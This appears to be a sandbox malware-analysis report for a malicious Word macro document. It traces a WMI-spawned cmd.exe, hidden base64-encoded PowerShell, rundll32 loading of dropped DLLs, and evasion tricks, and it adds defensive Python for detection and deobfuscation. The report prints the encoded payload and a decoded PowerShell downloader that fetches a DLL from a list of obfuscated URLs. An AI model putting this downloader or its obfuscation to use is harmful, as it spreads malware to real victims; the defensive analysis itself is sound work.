wBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL Jump to behavior
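Detection logic for the process chain listed above, as an added example that is not part of the sandbox report and not Joe Sandbox code. The events are constructed from the "Process created" lines (parent -> child) plus one benign control. The WmiPrvSE.exe parent of cmd.exe is an assumption: the report shows WINWORD.EXE calling Win32_Process::Create over WMI and lists the parent of cmd.exe as unknown, which is what a WMI-spawned process looks like in a process tree. Rule names and the 20-character base64 threshold are this example's own choices.

```python
"""Process-tree detection for the chain recorded in this report.

Added example, not from the report or from Joe Sandbox. The events are
constructed from the "Process created" lines (parent -> child). The
WmiPrvSE.exe parent of cmd.exe is an assumption (the report shows
WINWORD.EXE calling Win32_Process::Create over WMI and lists the parent
of cmd.exe as unknown). Rule names and thresholds are illustrative.
"""
import ntpath
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WMI_HOST = "wmiprvse.exe"

# Constructed events: (parent image, child image, child command line).
EVENTS = [
    (r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
     "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to "
     "open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAi"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msg.exe",
     "msg user /v Word experienced an error trying to open the file."),
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAi"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\System32\rundll32.exe",
     r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL"),
    (r"C:\Windows\System32\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
     r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL"),
    (r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
     r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL"),
    # Benign control: Explorer opening a Control Panel applet the documented way.
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
     r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl"),
]


def base(path):
    return ntpath.basename(path).lower()


def rundll32_module(cmdline):
    """The module rundll32 loads: the first argument, up to ',' or whitespace,
    with surrounding quotes removed."""
    m = re.match(r"""\s*(?:'[^']*'|"[^"]*"|\S+)\s+['"]?([^'",\s]+)""", cmdline)
    return m.group(1) if m else None


def has_encoded_command(cmdline):
    """-EncodedCommand, or any prefix of it, followed by a base64-looking blob."""
    return any("encodedcommand".startswith(flag.lower()) and len(value) >= 20
               for flag, value in re.findall(r"(?<!\S)-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)", cmdline))


def evaluate(parent, image, cmdline):
    """Return the names of every rule this process-creation event triggers."""
    hits = []
    p, c, cl = base(parent), base(image), cmdline.replace("^", "")
    if c in SHELLS and (p in OFFICE or p == WMI_HOST):
        hits.append("office_or_wmi_spawns_shell")
    if c == "powershell.exe" and has_encoded_command(cl) \
            and re.search(r"(?i)(?<!\S)-w(?:indowstyle)?\s+hidden", cl):
        hits.append("hidden_encoded_powershell")
    if c == "rundll32.exe":
        module = rundll32_module(cl)
        if module and "control_rundll" in cl.lower():
            if ntpath.splitext(module)[1].lower() not in {".dll", ".cpl"}:
                hits.append("rundll32_control_rundll_odd_extension")
            if module.lower().startswith("c:\\users\\"):
                hits.append("rundll32_module_in_user_profile")
        if p == "rundll32.exe":
            hits.append("rundll32_relaunches_rundll32")
    return hits


def scan(events):
    """Events that triggered at least one rule, as (child image name, rule names)."""
    flagged = []
    for parent, image, cmdline in events:
        hits = evaluate(parent, image, cmdline)
        if hits:
            flagged.append((base(image), hits))
    return flagged


if __name__ == "__main__":
    for child, hits in scan(EVENTS):
        print(f"{child:15} {', '.join(hits)}")
```

Run stand-alone, it flags five of the seven events and leaves the Control Panel control untouched. The two rundll32 rules are the ones worth keeping in a real ruleset: a Control_RunDLL entry point pointed at a file that is neither .dll nor .cpl, and rundll32 relaunching itself, both match the SysWOW64 copies with random directory and extension names that this sample creates.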
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
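A decoder for the obfuscated launcher shown in the cmd.exe and PowerShell command lines above, and for the casing trick behind the PowerShell_Case_Anomaly Yara matches listed earlier. This is an added example, not part of the sandbox report. The embedded input is the first 232 base64 characters of the report's own -ENCOD argument, so the decoded text is a fragment of the script; the set of "normal" spellings and the format-string resolver are this example's own assumptions, not the Yara rule's logic.

```python
"""Decode the obfuscated PowerShell launcher recorded in this report.

Added example, not part of the sandbox report. Input is the cmd.exe command
line listed under "Process created": cmd.exe strips the ^ escape characters
before the child process sees them, and -ENCOD is an abbreviation of
PowerShell's -EncodedCommand, whose value is base64 of UTF-16LE text.
"""
import base64
import re

# Constructed input: the report's cmd.exe command line with the encoded
# payload cut down to its first 232 base64 characters (a script fragment).
ENCODED_PREFIX = (
    "IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0A"
    "ewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkA"
    "JwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAA"
)
CMDLINE = (
    "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to "
    "open the file. & P^Ow^er^she^L^L -w hidden -ENCOD " + ENCODED_PREFIX
)

# Spellings treated as normal here (an assumption modelled on the idea of the
# PowerShell_Case_Anomaly rule, not that rule's own string list).
NORMAL_CASINGS = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}

# "{4}{1}{0}{3}{2}" -F 'a','b',... : the format operator used to hide a literal.
FORMAT_RE = re.compile(r'''"((?:\{\d+\})+)"\s*-[fF]\s*((?:'[^']*'\s*,\s*)*'[^']*')''')


def strip_cmd_escapes(cmdline):
    """cmd.exe removes ^ before passing arguments on: P^Ow^er^she^L^L -> POwersheLL."""
    return cmdline.replace("^", "")


def find_case_anomalies(cmdline):
    """Every 'powershell' token whose casing is not one of the normal spellings."""
    return [t for t in re.findall(r"(?i)\bpowershell\b", cmdline)
            if t not in NORMAL_CASINGS]


def find_encoded_command(cmdline):
    """Return the argument of -EncodedCommand or of any prefix of it (-e, -enc,
    -ENCOD ...), which PowerShell accepts as long as the prefix is unambiguous."""
    for flag, value in re.findall(r"(?<!\S)-([A-Za-z]+)\s+(\S+)", cmdline):
        if "encodedcommand".startswith(flag.lower()):
            return value
    return None


def decode_encoded_command(b64):
    """-EncodedCommand payloads are UTF-16LE, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16le")


def resolve_format_strings(script):
    """Fold each "{n}{m}..." -F 'x','y',... expression into the literal it builds."""
    def fold(match):
        order = [int(i) for i in re.findall(r"\{(\d+)\}", match.group(1))]
        parts = re.findall(r"'([^']*)'", match.group(2))
        if max(order) >= len(parts):
            return match.group(0)          # malformed: leave it untouched
        return "'" + "".join(parts[i] for i in order) + "'"
    return FORMAT_RE.sub(fold, script)


def deobfuscate(cmdline):
    """Run the three steps in order and return what each produced."""
    clean = strip_cmd_escapes(cmdline)
    b64 = find_encoded_command(clean)
    script = decode_encoded_command(b64) if b64 else ""
    return {
        "case_anomalies": find_case_anomalies(clean),
        "script": script,
        "resolved": resolve_format_strings(script),
    }


if __name__ == "__main__":
    result = deobfuscate(CMDLINE)
    print("case anomalies:", result["case_anomalies"])
    print("decoded :", result["script"].strip())
    print("resolved:", result["resolved"].strip())
```

The decoded fragment opens with `sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s'))`, which the resolver turns into a Set-Variable of the literal `sysTEm.Io.DIrecTorY`; the same `-F` reordering hides the `CreateDirectory` and `ServicePointManager` names used later in the script, which is why string matching on the raw base64 or on the decoded text alone misses them.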
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source: MAIL-0573188.doc Initial sample: OLE summary subject = Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: MAIL-0573188.doc Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788 Name: Owppnp8hah4xo788
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008085 push ecx; ret 7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004ADA push ecx; ret 7_2_10004AED

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Shuwftk\rwhokf.exo:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gfhmd\pcib.aey:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F109C FindFirstFileW, 13_2_001F109C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 7_2_100011C0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021C4FF mov eax, dword ptr fs:[00000030h] 7_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0032C4FF mov eax, dword ptr fs:[00000030h] 8_2_0032C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC4FF mov eax, dword ptr fs:[00000030h] 9_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FC4FF mov eax, dword ptr fs:[00000030h] 10_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002EC4FF mov eax, dword ptr fs:[00000030h] 11_2_002EC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021C4FF mov eax, dword ptr fs:[00000030h] 12_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001FC4FF mov eax, dword ptr fs:[00000030h] 13_2_001FC4FF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_10001B30
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 5.2.136.90 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
